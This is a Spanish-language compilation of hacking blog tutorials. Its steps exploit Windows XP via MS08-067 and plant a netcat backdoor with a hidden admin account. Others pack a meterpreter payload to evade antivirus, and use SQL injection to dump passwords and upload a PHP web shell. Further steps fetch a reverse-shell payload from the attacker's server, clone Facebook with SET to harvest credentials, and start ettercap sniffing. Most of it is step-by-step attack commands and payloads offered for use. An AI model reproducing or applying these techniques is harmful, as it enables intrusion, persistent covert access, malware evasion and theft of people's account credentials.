Vous êtes sur la page 1sur 109

Backdorizando un sistema, activando acceso remoto y

ocultando usuarios
En esta publicacin veremos como activar el acceso remoto de un sistema y como backdorizar un
sistema, es decir mantener el acceso a una computadora una vez que ya la hemos hackeado :)

entonces comenzamos :D!!!!!

En esta ocasin haremos la prueba sobre un windows xp (si ese sistema operativo que ya no es
tan nuevo pero todava hay muchisimas computadoras con ese windows incluso he visto maquinas
con windows 98 XD).

Primero procedemos a detectar los dispositivos conectados a mi red


Entonces supongamos que llama mi atencin la 1er ip es decir la ip 192.168.1.14, Averiguemos
que sistema operativo corre sobre esa ip


Estamos de suerte todo parece indicar que esa computadora tiene windows xp y tiene abierto el
puerto 445 (Asi es estaremos usando el exploits mas famoso que utilizamos cuando estamos
empezando a utlizar metasploit "ms08_067_netapi")

Antes de lanzar nuestro ataque con metasploit, verifiquemos si ese sistema es vulnerable al exploit
que queremos lanzarle, con ayuda de nmap y uno de sus scripts sabremos si vale la pena lanzar el
exploit.





Aaaaa!!!!! que ha pasado A caso ese script ya no funciona?
Veamos al parecer hub un punto en el que una actualizacin de nmap hizo que cambiara la
sintaxis para poder lanzar nmap en conjunto con el script que verifica si el sistema es vulnerable,
pero no hay problema el mismo nmap nos muestra como solucionar este detalle
(Asi es todo es cuestin de leer que es lo que nos aparece en pantalla, por favor lean la mayoria de
las veces los problemas o los detalles que surgen tienen solucin y los mismos programas nos dan
esa solucin)

el script me esta indicando que agregue lo siguiente: --script-args=unsafe=1




Ahora vemos como agregando lo que el programa nos indicaba el script hace su trabajo
correctamente y detectamos que esa computadora si es vulnerable al ataque que teniamos
pensado realizar, entonces vamos a proceder con el ataque


Listo ya estamos dentro del sistema con una secin de meterpreter!!!!
(Si has llegado a este blog es por que ya sabes que fue lo que hice con ese comando, en 1 solo
comando mande llamar a mestasploit, configure el exploit y el payload, si no tienes idea de que es
cada cosa entonces es un buen momento para hacer la investigacin por tu cuenta ;) )

Bueno una vez dentro del sistema confirmemos que no hay acceso remoto abrimos otra pestaa y
de nuevo escaneamos la maquina comprometida



Haciendo una pequea busqueda en el tema de acceso remoto en forma grfica que tiene
windows, descubrimos que el puerto para el acceso remoto grfico que trae windows es el puerto
3389, entonces en nuestra sesin de meterpreter tenemos un comando que nos activa el acceso
remoto en el sistema que tenemos comprometid0 :D

el comando es run getgui -e

Y el resultado es!!!!!!!!!!!
Meterpreter session 1 closed, bueno al parecer el scrip no esta funcionando muy bien, de modo
que no podemos activar el escritorio remoto por medio meterpreter.

Intentemos algo mas :)

vamos a interactuar con la consola de msdos del sistema haber que podemos lograr :D



recordamos que esta computadora no tiene el acceso remoto activado y queremos activarlo,
entonces habramos el puerto que le corresponde al escritorio remoto de windows, como ya hicimos
la investigacion sabemos que debemos abrir el puerto 3389.



Al parecer el comando fue correcto y el puerto 3389 fue abierto extitosamente, comprobemoslo con
otro comandos de ms-dos




Ahi podemos comprobar que si se abrio el puerto 3389, es el ultimo de la lista

Ahora procedamos a escanear de nuevo el sistema solo para comprobar que ya tenemos el puerto
3389 abierto :D



Rayos!!!! que a pasado si ya habrimos el puerto necesario para el escritorio remoto.
Veamos que nos dice la configuracion de escritorio remoto de windows






Al parecer, apesar de que el puerto del Escritorio remoto este abierto el servicio esta deshabilitado
regresemos a kali para tratar de habilitarlo


aprovechamos la shell de ms-dos que tenemos, o incluso esto que haremos con la shell de ms-dos
lo podriamos hacer desde meterpreter.

Vamos a modificar el valor del registro que corresponde a la habilitacion del Escritorio remoto


Bueno ahi vemos que en el 1er intento tuve un error por que le puse red en vez de reg,
Ahora por que deje mi error y por que lo menciono? pues para que tomen en cuenta que cuando
esten realizando algo y obtengas un error, recuerda que debes de darle una revisada a lo que
estas haciendo ;)

ahora comprobemos con nmap si ya tenemos el puerto abierto XD





Excelente al parecer ya podremos acceder graficamente al equipo comprometido





Bueno aqui surge un detalle necesito tener un nombre de usuario y una contrasea para acceder,
tenemos 2 opciones

1er opcin, tratar de obtener las contraseas de los usurios de ese windows
2da opcin, hacer un usuario desde la consola de ms-dos

entonces vayamos por la segunda opcin :D

procedemos a crear un usuario




Hemos creado un usuario llamado kali y su contrasea es t3mp0r4l, entonces hay que proceder a
tratar de conectarnos






vaya nos hemos topado con un problema, el usuario que acabamos de crear carece de privilegios
:(
Entonces procedamos a elevarle privilegios :D :D :D :D :D
nos vamos a la shell de ms-dos que tenemos




Excelente al parecer ya tenemos privilegios adminsitrativos intentemos de nuevo conectaronos :D



Listo ya tenemos acceso con un usuario legitimo, ahora aparece el siguiente mensaje, nos dice
que vamos a desconectar al usaurio que ya se encuentra logueado en ese sistema entonces por lo
pronto no vamos a conectarnos, aprovechemos que ya tenemos el acceso remoto y tenemos una
shell en el sistema.
Por el momento procedemos a backdorizar el sistema :D probablemente este debio ser nuestra
prioridad y debio haber sido el 1er paso, asi que toma en cuenta que en cuanto tengas acceso al
sistema una de las 1eras cosas que debes hacer es asegurar tu permanencia en el equipo que
hayas comprometido.

entonces hay varios backdoors que funcionan muy bien, al dia de hoy los backdoors que tiene
metasploit en la shell de meterpreter, son facilmente detectados por todos los antivirus, entonces
usaremos netcat aprovechando que kali trae ese programa.
ojo netcat no es un virus es una herramienta de administracin remota, pero como muchos hackers
empezaron a utilizarlo para backdorizar sistemas pues los antivirus lo detectan como un virus,
aunque realmente no lo es.

entonces para evitar problemas utilizemos una herramienta de la que ya hemos hablado en este
blog
The enigma protector
aqui te pongo la liga para que lo veas si es que aun no lo conoces
http://hacking-pentesting.blogspot.mx/2013/12/evadiendo-antivirus.html

entonces primero encontremos netcat


Vemos que incluso hay varias herramientas para .exe es decir windows, ademas de una carpeta
de backdoors pero usaremos netcat entonces ahora procedemos a usar the enigma protector para
evitar que los antivirus lo detecten ese paso no lo voy a documentar ya que ahi esta el link al post
donde hablamos de ese programa.

bueno una vez que le hemos pasado el software the enigma protecto a nuestro netcat lo ponemos
en nuestro Desktop de kali y porcedemos a subirlo, la ruta mas conveniente seria
c:\windows\system32


observen que me sali de la consola de ms-dos y desde meterpreter puse /root/Desktop/nc.exe
c:\\windows\\system32 <-- ojo con eso si no pongo las doble \\ no podra subir el backdoor ;)

ahora procedemos a configurarlo para que se inicie cada vez que esa computadora se encienda y
cargue el sistema operativo, lo primero que haremos es verificar cuales programas se ejecutan al
inicio de windows



Bueno ahi vemos los 4 programas que se inician al cargarse el sistema operativo
Ahora procedamos a configurar que nuestro backdoor se ejecute al inicio de la carga del sistema





Al parecer todo fue correcto al principio puse para que el backdoor se ejecutara a travez del puerto
445 lo cual es un error por que ese puerto ya esta utilizado por windows entonces volvi a ejecutar
el comando y esta vez lo puse en el puerto 455 :)

comprobemos si es que esta configurado para lanzarse al inicio de windows





Todo correcto!!! pero falta otro paso mas!!! hay que abrir el puerto 455 en el firewall :)



Bueno aqui hemos configurado para que se habra el puerto 455 y de paso comprobamos que ya
tenemos abierto ese puerto :D

muy bien ahora ye tenemos 3 cosas

1 Activamos el acceso remoto
2 Tenemos un usuario y contrasea en ese sistema y nuestro usuario tiene privilegios
administrativos
3 Tenemos backdorizado el sistema

ahora hagamos algo un poco mas complejo, vamos a ocultar nuestro usuario :)

procedmos a salirnos de la shell de ms-dos para regresar a mterpreter y poner el comando idletime




Con el comando idletime podemos ver por cuanto tiempo el usaurio de la computadora que hemos
comprometido no ha tocado ni el mouse ni el teclado de su computadora, y eso para que me
serviria? pues tal vez sea un buen momento de acceder remotamente para hacer una modificacion
al registro de windows y poder ocultar el usuario :)
(por supuesto podriamos hacerlo desde la shell de ms-dos que ya tenmos lista pero ese tipo de
temas mas especializados se ven en el curso oficial)

Antes de hacer la modificacion veamos el panel de control de la maquina comprometida



Ahi comprobamos que el usuario que hicimos llamado kali, es visible entonces procedemos a
ocultarlo de la siguiente manera

para hacer eso habrimos el registro de windows y nos dirijimos a la ruta


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
Nt\CurrentVersion\Winlogon\SpecialAccounts\UserList
Y creamos un nuevo DWORD value y le damos el nombre de el usuario que queremos ocultar en
ese caso se llama kali





Y procedemos a crear el valor DWORD con el nombre kali :)



Y ya que hacemos eso veamos el resultado!!!!



Ahi esta el resultado por lo menos ya no es visible a simple vista, pero el usuario no esta
completamente oculto podriamos verlo en la consola de ms-dos del sistema con el comando net
user


por ejmplo veamos


Puntos a tomar en cuenta:
Esto tambien se puede hacer con windows 7 pero para configurar el firewall el comando cambia
un poco
Backdorizar un windows vista, windows 7, windows 8 es un poco mas complicado por que
tienen proteccion las carpetas y es un poco mas complicado el elevar privilegios pero si es
posible, (en el curso oficial de este blog enseamos como hacerlo)
Ocultar usuarios tambien se puede hacer remotamente y por medio de una shell si tenemos una
consola
Esto solo fue una forma sencilla de hacerlo
Desde la consola de ms-dos de windows podemos descargar programas
Saludos espero hayan disfrutado de esta publicacion tanto como yo disfrute haciendola,
recuerden!!!! nunca pongo los comandos, prefiero poner las evidencias de esa manera los obligo a
que escriban todo!!! :D :D :D :D :D

Evadiendo antivirus
En este post veremos una tcnica sencilla y efectiva de evadir antivirus.
Comunmente encontraras este tema como bypass antivurs, si buscas la definicin por la web
acerca de bypass antivirus te daras cuenta que no hay algo concreto, hacer un bypass
simplemente es hacer que los antivirus no detecten nuestros programas maliciosos :D

Hay muchisimas tcnicas para hacer este tipo de trabajos y se debe tomar en cuenta 2 puntos muy
importantes:

El primer punto:
Si tenemos un antivirus como Avg, avast, avira, etc etc y hacemos una tcnica de bypass y el
antivirus que tengamos no detecta nuestro programa malicioso, eso no quiere decir que ningun
antivirus vaya a detectar nuestro programa o que el bypass sea efectivo en todos los antivirus
El segundo punto:
probablemente nuestro bypass funcione por un tiempo pero como los antivirus se actualizan, pues
es posible que con el tiempo nuestro bypass no funcione y cualquier antivirus nos detecte


























Para este ejercicio el antivirus que usaremos ser el AVG 2014, aqui pongo la prueba que esta
actualizado al fia de hoy (miercoles 4 de diciembre del 2013)


El programa que usaremos se llama The Enigma Protector, este es un sistema profesional para
licencias y proteccin de archivos ejecutables en windows, The Enigma Protector es una
herramienta escensial para cada desarrollador de software comercial.

Alguna vez tuvieron algun programa y aunque no era un virus o un programa malicioso su
antivirus lo detectaba como si fuera un virus? si alguna vez les ha pasado tal vez con The Enigma
protector puedan solucionar ese problema.




Bueno vamos sobre la practica, lo primero que debemos de hacer es nuestro payload
ponemos el comando:
msfpayload windows/meterpreter/reverse_tcp lhost="mi ip local" lport=1234 X >
/root/Desktop/virus.exe

supongo que no es necesario explicar ese comando, si has dado con este blog y no sabes que es
cada cosa que escrib en ese comando te sugiero buscar en google el curso que se llama
metasploit unleashed <-- es gratuito y esta muy bien explicado.



Este archivo llamado pacman.exe lo debemos pasar a nuestra maquina que tiene el sistema
operativo windows y que tiene el The Enigma Protector instalado




Pero!!!! antes de pasar el archivo supongo que sera buena idea tener listo nuestro metasploit
ponemos el comando msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
lhost=192.168.1.71 lport=1234 E


Listo ya tenemos nuestro metasploit listo para tener una sesion de meterpreter cuando ejecuten
nuestro pacman.exe, ahora antes de pasar nuestro pacman.exe hay que desactivar el antivirus,
claro no para ejecutarlo sino para que el antivirus no vaya a borrar el archivo, recuerden que
tenemos que modificarlo entonces desactivamos el antivirus para poder trabajar sobre el archivo
pacman.exe



Una vez que hayamos desactivado el antivirus y hayamos copiado nuestro archivo pacman.exe a
nuestro windows abrimos el programa The Enigma Protecto y damos click en Directorio





Una vez que hayamos dado click en Directorio buscamos nuestro archivo pacman.exe y damos
click en el boton abrir, entonces ahora se nos mostrara que se va a crear un archivo llamado
pacman_protected.exe solo tenemos que dar click en el boton proteger





Una vez que The Enigma Protector haya terminado el trabajo nos aparecer de la siguiente
manera y simplemente debemos dar click en el boton cerrar


Por ultimo cuando cerramos The Enigma protector nos pregunta si queremos salvar el proyecto,
ahi simplemente le damos click en no




Aqui vemos como tenemos el archivo original pacman.exe y el archivo modificado
pacman_protected.exe


Escaneemos el archivo pacman



Aqui podemos ver como AVG lo detecta rpidamente

Ahora hagamos el escaneo sobre el archivo pacman_protected



Vemos que el antivirus ahora no lo ha detectado, pero ahora debemos comprobar que nuestro
archivo .exe sigue funcionando es decir nuestro payload no haya quedado "corrupto" por la
modificacion que hicimos, entonces procedemos a ejecutarlo































Ahora veamos en nuestro kali que ha pasado




Como vemos tenemos meterpreter dentro del sistema veamos sobre que sistema operativo fue
ejecutado nuestro payload



Bueno aqui podemos ver que esto funciona perfectamente con un antivirus actualizado y sobre un
windows 7 actualizado y de 64 bits.

Es todo por el momento espero hayan disfrutado de este post :)




De SQL injection hasta obtener una shell
De sql injection a obtener shell

Este post tiene dedicatoria a todos los miembros de pentester guanajuato global team, gracias por
la invitacin :)



Empezemos: en este post veremos un poco de sql injection y como un atacante puede obtener
desde los datos que se encuentran en la base de datos hasta una shell del sistema donde se
encuentra alojada la pgina web y la base de datos :D

Est ser la pgina en que haremos el pentest


Primero haremos un information gathering, para realizarlo podemos usar telnet o netcat

telnet paginaweb.com 80
GET / HTTP/1.1
host:paginaweb

netcat paginaweb.com
GET / HTTP/1.1
host:paginaweb


como podemos observar ahi tenemos la version de apache

Ahora veamos un poco de teora, supongamos que estamos en una pagina de noticias y tenemos
3 pginas con noticias estas seran las 3 urls.

http://www.web.com/noticia.php?id=1 <-- noticia 1
http://www.web.com/noticia.php?id=2 <-- noticia 2
http://www.web.com/noticia.php?id=3 <-- noticia 3

el cdigo php de esa pagina para cargar las noticias sera algo as

< ?php
$id = $_GET["id"];
$resultado = mysql_query("select * from noticias where id=".$id);
$fila = mysql_fetch_assoc($reultado);
//nos da la informacion de la noticia de la consulta
?>

Ahora pasando al material que tenemos para trabajar
si ponemos asi ----> http://www.web.com/noticia.php?id=1'
se va a ejecutar esto ---> select * from noticias where id = 1'
pero la sintaxis de esta peticion sql es incorrecta por la comilla ' y la base de datos nos dara un
error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version
for the right syntax to use near ''' at line 1.
este error puede o no puede ser visible depende de la configuracion del php

aqui el ejemplo del error de SQL syntax de nuestra web








IMPORTANTE!!!!!
el valor que esta en la url hace un eco directamente en la consulta y es considerado como un
integer, esto
nos permite hacer una consulta a la base de datos una operacion basica matematica
es decir
http://www.web.com/noticia.php?id=2-1 <--- esto sera como
select * from noticias where id=2-1 entonces el la noticia 1 ser mostrada en la url





Por ejemplo en nuestra pagina tenemos

http://192.168.1.88/cat.php?id=3

y tambin
http://192.168.1.88/cat.php?id=2


Veamos que pasa cuando hacemos
http://192.168.1.88/cat.php?id=3-1

Aqui vemos como al hacer la operacion matemtica 3-1=2 == http://192.168.1.88/cat.php?id=2


explotando sql injections con UNION


Para hacer la sql injection (a mano nada de usar programas como havij sqlmap a menos que
seas un lamer de primera, a menos que ya sepas hacer esto por ti mismo no hay ningun
problema en utilizar herramientas que te pueden automatizar el proceso, y ademas ya sabes que
es lo que realmente esta pasando en tu ataque) necesitamos encontrar el numero de colimnas
para ejecutar union

si ponemos
http://192.168.1.88/cat.php?id=2 union select 1,2

en la url aparecen varios %20 ese es el del espacio y el navegador lo pone automticamente, ahi
podemos ver que nos da informacin interesante
lo que ha pasado es lo siguiente:
select id,nombre,fecha,foto from noticias where id=1 union select 1,2
es decir hicimos una consulta donde estamos requiriendo 2 campos sin embargo la tabla tiene 4
campos, no hay que confundir que a una tabla podemos hacer la consulta a 1 solo campo con esto
que estamos haciendo, en este caso estamos tratando de encontrar todos los campos de la tabla

entonces intentamos lo siguiente
http://192.168.1.88/cat.php?id=2 union select 1,2,3

en este caso de nuevo aparece el mensaje que la sentencia tiene diferente numero al de las
columnas existentes en la tabla, recuerden que estamos tratando de averiguar cuantos campos
hay en esa tabla de la base de datos
esta vez hicimos algo como esto:
select id,nombre,fecha,foto from noticias where id=1 union select 1,2,3

intentemos con esto: http://192.168.1.88/cat.php?id=2 union select 1,2,3,4

Excelente!!! ya no obtuvimos el mensaje de que no corresponde la sentencia con el numero de
campos es decir que ya sabemos que existen 4 campos.
Ahora que ya sabemos el numero de columnas podemos acceder a cierta informacion de la base
de datos

ahora que ya sabemos el numero de columnas podemos acceder a cierta informacion de la base
de datos

la sentencia @@version me dice la version de la base de datos
la sentencia current_user() el usuario usado por la aplicacion php para conectar a la base de datos
la sentencia database() ya se imaginarn que hace :p

entonces procedemos a encontrar la version con
http://192.168.1.88/cat.php?id=2 union select 1,@@version,3,4,5


Eee!!! momento que ha pasado si estoy poniendo 4 columnas por que me aparece que hay
diferencia en el statment y el numero de columnas???

al parecer la tabla donde ejecutemos la sentencia para poder ver la version debe tener un numero
diferente de columnas de modo que hagamos una prueba pongamos 3 en vez de 4 es decir:
http://192.168.1.88/cat.php?id=2 union select 1,@@version,3,4


Listo ya tenemos la verison!!!!

ahora procedamos a ver el usuario
http://192.168.1.88/cat.php?id=2 union select 1,current_user(),3,4

Ya tenemos el usuario :D

Ahora veamos el nombre de la base de datos
http://192.168.1.88/cat.php?id=2 union select 1,database(),3,4

Listo!!!! nombre de la base de datos obtenida

ahora obtengamos las tablas, para eso haremos consultas en la base de datos
information_schema
por que mysql provee tablas que contienen meta-informacion de la base de datos que estamos
obteniendo informacin

http://192.168.1.88/cat.php?id=2 union select 1, table_name,3,4+from+information_schema.tables

Listo el problema es que me esta dando todas las tablas de las bases de datos que hay y yo quiero
solo los de la base de datos que estoy tratando de obtener informacion (photoblog)

Intentemos con esto
http://192.168.1.88/cat.php?id=2%20union%20select%201,concat%28table_name,
%27:%27,table_name%29,3,4%20from%20information_schema.columns+where+table_schema=d
atabase%28%29--

Excelente despues de varias pruebas y errores con diferentes sentencias pudimos obtener el
resultado deseado (Ya te tocar investigar que es todo ese cdigo en la sentencia no tendras todo
tan regalado lamer XD XD XD XD XD).

bueno ahora toca el turno de saber como se llaman los campos de la tabla users
http://192.168.1.88/cat.php?id=2%20union%20select%201,concat(column_name),3,4%20from
%20information_schema.columns+where+table_name=users

Al parecer hay un error en la columna users :( vaya se ha resistido XD XD XD XD, bueno hemos
estado utilizando chrome, ahora utilizemos firefox para ayudarnos de hackbar :D :D :D :D :D

abrir hackbar y seleccionar el nombre users e ir a encoding, hex encoding y seleccionar la 1er
opcion quedar algo as

Damos click en Execute y vemos que no pasa nada, jejeje esta web se se resiste intenemos
agregando un 0x es decir
http://192.168.1.88/cat.php?id=-2 union select 1,concat(column_name),3,4 from
information_schema.columns+where+table_name=0x7573657273

Excelente ahora si ya tenemos los campos que necesitamos para realizar la sentencia y obtener
los datos que necesitamos

Entonces manos a la obra obtengamos los usuarios y contraseas de esta base de datos
http://192.168.1.88/cat.php?id=2%20union%20select%201,concat
%28login,%27:%27,password%29,3,4%20from%20users;


Muy bien tenemos al usuario admin y la contrasea encriptada, hay muchas formas y/o tcnicas
para desencriptar ese hash, por ejemplo; findmyhash, john the ripper, crackstation.net, en esta
ocasin usaremos la pgina crackstation.net


listo: usuario admin contrasea P4ssw0rd

ahora tratemos de obtener una shell en ese sistema :D



Listo estamos logueados como admins ahora tratemos de subir algun archivo php que nos deje
ejecutar comandos en el sistema :D

para eso creamos un arhivo php que contenga el siguiente codigo

<?php
system($_GET['cmd']);
?>

si logro subir un arhivo php que contenga ese codigo podre ejecutar comandos en el sistema
donde esta alojada la pagina web.

primero vamos a crearlo

vamos a tratar de subirlo damos click en New picture y despues en examinar y buscamos nuestro
php

Al tratar de subirlo vemos que nos dice

Entonces tiene una proteccin de deteccion de archivos para poder hacer un bypass o evasin de
deteccin de los tipos de archivos podemos hacer un archivo de nombre .php3


Aqui vemos como nuestro php fue subido exitosamente


ahora tenemos que encontrar la ruta donde esta nuestro php :D

una vista rpida al codigo fuente del index me da lo que estoy buscando

admin/uploads/shell.php3 :D


ahora para ejecutar comandos ponemos lo siguiente
http://192.168.1.88/admin/uploads/shell.php3?cmd="comando a ejecutar"

http://192.168.1.88/admin/uploads/shell.php3?cmd=uname -a


http://192.168.1.88/admin/uploads/shell.php3?cmd=cat%20/etc/passwd

nosotros somos el usaurio www-data ese usuario no tiene privilegios de root, veamos que
podemos hacer para obtener una shell dentro del sistema desde kali :D

primero hacemos un payload para linux
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=puerto R | msfencode -t elf -e
x86/shikata_ga_nai >> Executive



Pasamos ese payload a nuestro webserver en kali aprovechando que tenemos apache :D


Aqui vemos como se copio el payload a la carpeta del webserver de kali y ademas hicimos un ls
para comprobar que ahi esta nuestro payload, ahora toca descargarlo en el servidor que
hackeamos


Aparentemente no ocurrio nada pero que pasa si hacemos un "ls"


Ahi se encuentra nuestro payload que se llama Executive, procedemos a ejecutarlo pero primero
hay que preparar el listener de metasploit
msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=IP
LPORT=port E


ahora si procedemos a ejecutar


y vemos el resultado en nuestro metasploit

Tenemos meterpreter en ese sistema :D

Sin embargo no tenemos altos privilegios todavia, tratemos de leer el archivo shadow

Solamente usuarios con permisos elevados pueden leer ese archivo, hay muchas tcnicas para
elevar privilegios en linux, tratemos de entrar al gestor de base de datos mysql

Hemos podido entrar al gestor de base de datos mysql de ese sistema por que el usuario por
default no tiene contrasea
mysql -u root -p

incluso podemos ver la bases de datos que hay en ese sistema

Ahora tratemos de vizualizar archivos desde mysql


y aqui el resultado


ahora tratemos de leer el archivo shadow

Como vemos no hemos podido leer el contenido del archivo shadow :(
en un post posterior veremos como elevar privilegios en linux, por otra parte cabe mencionar que
todo lo que hemos hecho en la pgina, quedo registrado en los logs del apache

aqui les paso solo alguno de los logs que generamos
192.168.1.104 - - [28/Nov/2013:17:13:47 +0000] "GET
/cat.php?id=2%20union%20select%201,@@version,3,4 HTTP/1.1" 200 830 "-"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/27.0.1453.110 Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:13:48 +0000] "GET /admin/uploads/3
HTTP/1.1" 404 505
"http://192.168.1.88/cat.php?id=2%20union%20select%201,@@version,3,4"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/27.0.1453.110 Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:13:53 +0000] "GET /favicon.ico
HTTP/1.1" 404 502 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110
Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:13:54 +0000] "GET
/cat.php?id=2%20union%20select%201,@@version,3 HTTP/1.1" 200 762 "-"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/27.0.1453.110 Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:13:55 +0000] "GET /favicon.ico
HTTP/1.1" 404 502 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110
Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:14:02 +0000] "GET
/cat.php?id=2%20union%20select%201,@@version,3,3,3 HTTP/1.1" 200 762 "-"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/27.0.1453.110 Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:14:03 +0000] "GET /favicon.ico
HTTP/1.1" 404 502 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110
Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:14:05 +0000] "GET
/cat.php?id=2%20union%20select%201,@@version,3,3 HTTP/1.1" 200 829 "-"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/27.0.1453.110 Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:14:05 +0000] "GET /admin/uploads/3
HTTP/1.1" 404 505
"http://192.168.1.88/cat.php?id=2%20union%20select%201,@@version,3,3"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/27.0.1453.110 Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:14:05 +0000] "GET /favicon.ico
HTTP/1.1" 404 502 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110
Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:19:59 +0000] "GET
/cat.php?id=2%20union%20select%201,@@version,2,3,4 HTTP/1.1" 200 763 "-"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/27.0.1453.110 Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:20:00 +0000] "GET /favicon.ico
HTTP/1.1" 404 502 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110
Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:21:52 +0000] "GET
/cat.php?id=2%20union%20select%201%20where%20id=1 HTTP/1.1" 200 815 "-"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/27.0.1453.110 Safari/537.36"
192.168.1.104 - - [28/Nov/2013:17:21:53 +0000] "GET /favicon.ico
HTTP/1.1" 404 502 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110
Safari/537.36"



Obtener Contraseas de facebook, twitter, hotmail,
gmail
En esta ocasion les presento como obtener contraseas de facebook por medio de una
herramienta de ingenieria social llamada set (social engineering tool-kit)

para abrir esta herramienta hacemos lo siguiente

1.- Abrimos una consola y nos dirijimos a la siguiente direccion
/pentest/exploits/set <---- (cd /pentest/exploits/set) escribimos ls para buscar los archivos de esa
carpeta y buscamos el archivo que se llama set lo ejecutamos escribiendo ./set






2.- Asi sera nuestra interfaze una vez hayamos abierto set


3.- En este caso seleccionamos la opcion 1 Social-Engineering Attacks


4.- De aqui nos vamos a la opcion 2 Website Attack Vectors


5.- Aqui seleccionamos la opcion 3 Credential harvester Attack Method
6


6.- Llegando a este punto seleccionamos la opcion 2 Site Cloner


7.- Aqui nos pide que pongamos nuestra ip local o la global dependiendo de donde querramos
hacer nuestro ataque de ingnieria social en este caso lo haremos en nuestra misma red por lo que
debemos de saber cual es nuestra ip local, para hacer eso simplemente abrimos otra consola y
escribimos ifconfig si estamos conectados por medio de wifi buscamos nuestra ip en la interface
wlan0 si estamos conectados por ethernet pues buscamos la interface eth0 :)


8.- En este paso ponemos cual pagina es la que queremos usar para obtener contraseas, puede
ser twitter, hotmail, myspace facebook e incluso paginas de bancos.



9.- En esta parte vemos elproceso de clonacion de la pagina y cuando termina de clonar nos da el
mensaje de que esta a la espera de que el usuario meta sus datos para que nos llegue a nosotros

hyperterminatestingtheconnectionofahost.etowns.org

link a ip 186.1.16.246 backtrack
hyperterminatestingtheconnectionofahost.etowns.org






10.- Aqui ya estmos viendo que nuestra victima abrio nuestra pagina falsa nosotros debemos de
mandarle a nuestra victima la iplocal por que ahi es donde se guarda en este caso la pagina
clonada de facebook se quedo en mi ip que seria la 192.168.1.125





11 .- En esta parte vemos que la viticma esta poniendo su usaurio y contrasea de facebook, en
este caso el usuario es correo@hotmail.com y la contrasea es contrasea.,..01





12 .- En esta pantalla el usuario anteriormente ya le dio click en enviar entonces lo que hizo
nuestra pagina fue redirigirlo a la pagina oficial de facebook pero los datos ya me los mando a mi
consola donde tenia esperando a que me llegaran los datos del usuario





13 .- Listo ya nos llego la contrasea.

Espero les haya gustado y haya sido claro :D


Sniffer espiando el trafico en nuestra red local :)
En este post veremos algunas cosas que podemos lograr con el sniffeo en alguna red local.

Que es un sniffer y que podemos hacer con el? un sniffer es un software con el cual podemos ver
el trfico de nuestra red local, para poder ver el trfico de nuestra red la tarjeta de red que estemos
usando debe de ponerse en modo promiscuo, el modo promiscuo se activa automtica mente al
configurar nuestro sniffer y lanzar el anlisis de nuestro trafico.
Osea es estar de chismoso viendo lo que los dems estn haciendo en nuestra red XD

Bueno en este ejemplo utilizar como atacante a una maquina con kali-linux y la vitcitma ser un
Windows 7 ultimate

Lo primero que haremos es mandar llamar a nuestro programa. kali linux trae varios sniffers pero
en esta ocasin usremos ettercap.

el comando para mandarlo llamar ser ettercap -G (ojo podemos manejar ettercap de varias
maneras el parmetro -G es para mandarlo llamar de forma grfica)



siguiente paso ser ir al menu Sniff y seleccionamos Unified sniffing ahi lo que haremos es
seleccionar la interface de red que estamos utilizando, como en este caso yo estoy conectado por
medio de cable de red ethernet mi interfaz de red ser eth0


una vez le hemos dado click a Unified sniffing seleccionamos la interfaz eth0 como habamos
mencionado anteriormente


Una vez que hemos dado click en el boton de ok vemos como los menus cambian y en la parte
inferior nos da varios mensajes de cosas que "cargo ettercap" como lo son plugins, puertos y otras
cosas mas


El siguiente paso ser ver todos los dispositivos conectados a la red para eso nos vamos al menu
Hosts y damos click en Scan for hosts (tambin podemos presionar la combinacin de teclas Ctrl +
s)


Ahora procedemos a ver los hosts que encontr ettercap, para verlos hosts que encontr vamos al
menu Hosts y despues damos click en Hosts list


En este caso a mi me detect 4 hosts y veamos cuales fuern


En este caso seleccionaremos como nuestra victima el dispositivo con el ip 192.168.1.20 esa ser
nuestra victima otra cosa que necesitamos saber es cual es la ip del router, para saber la ip del
router tenemos el siguiente comando:
route -n


Ahi podemos observar que la ip local del modem es 192.168.1.254 ya que es lo que le corresponde
al Gateway o puerta de enlace.
